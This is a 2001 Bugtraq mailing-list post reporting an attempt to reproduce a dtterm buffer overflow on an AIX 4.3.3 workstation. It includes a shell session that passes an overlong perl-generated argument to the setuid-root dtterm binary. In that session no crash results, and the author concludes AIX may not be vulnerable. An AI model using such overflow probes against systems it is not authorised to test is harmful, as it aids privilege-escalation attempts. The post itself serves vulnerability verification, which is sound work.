For whatever reason, it seems that AIX may not be vulnerable. This test performed on a stinky old E30 133 MHz RS/6000, 512 MB "server" (more like a workstation now, and a wimpy one at that). But it's the only thing I could get my hands on to try this exploit(?) I was unable to get dtterm to segfault. This is AIX 4.3.3 with maintenance level of at least 6 applied, more likely 7 or 8. It's a uniprocessor box: lslpp -ha bos.up returns 4.3.3.26 applied & committed. Apologies to Bugtraqqers, I don't have time to try out the entire dt suite o' crap at the moment with the problems that have just cropped up. See details below. myuserid@ourhost01.fq.dn [/home/net/myuserid] [0] $ date date Thu Oct 4 08:58:33 EDT 2001 myuserid@ourhost01.fq.dn [/home/net/myuserid] [0] $ uname -a uname -a AIX ourhost01 3 4 00299A86C000 myuserid@ourhost01.fq.dn [/home/net/myuserid] [0] $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23462'` /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23462'` ksh: /usr/dt/bin/dtterm: arg list too long myuserid@ourhost01.fq.dn [/home/net/myuserid] [126] $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'` /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'` myuserid@ourhost01.fq.dn [/home/net/myuserid] [0] $ ls -al core ls -al core core not found myuserid@ourhost01.fq.dn [/home/net/myuserid] [2] $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'` /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'` myuserid@ourhost01.fq.dn [/home/net/myuserid] [0] $ ls -al core ls -al core core not found myuserid@ourhost01.fq.dn [/home/net/myuserid] [2] $ /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'` /usr/dt/bin/dtterm -tn `perl -e 'print "A"x23461'` myuserid@ourhost01.fq.dn [/home/net/myuserid] [0] $ ls -al core ls -al core core not found myuserid@ourhost01.fq.dn [/home/net/myuserid] [2] $ myuserid@ourhost01.fq.dn [/home/net/myuserid] [2] $ ls -al /usr/dt/bin/dtterm ls -al /usr/dt/bin/dtterm -r-sr-xr-x 1 root bin 40756 Jul 13 1999 /usr/dt/bin/dtterm Slán leat agus go n'eirí an bóthar leat. __________________________________________________ Do You Yahoo!? NEW from Yahoo! GeoCities - quick and easy web site hosting, just $8.95/month. http://geocities.yahoo.com/ps/info1
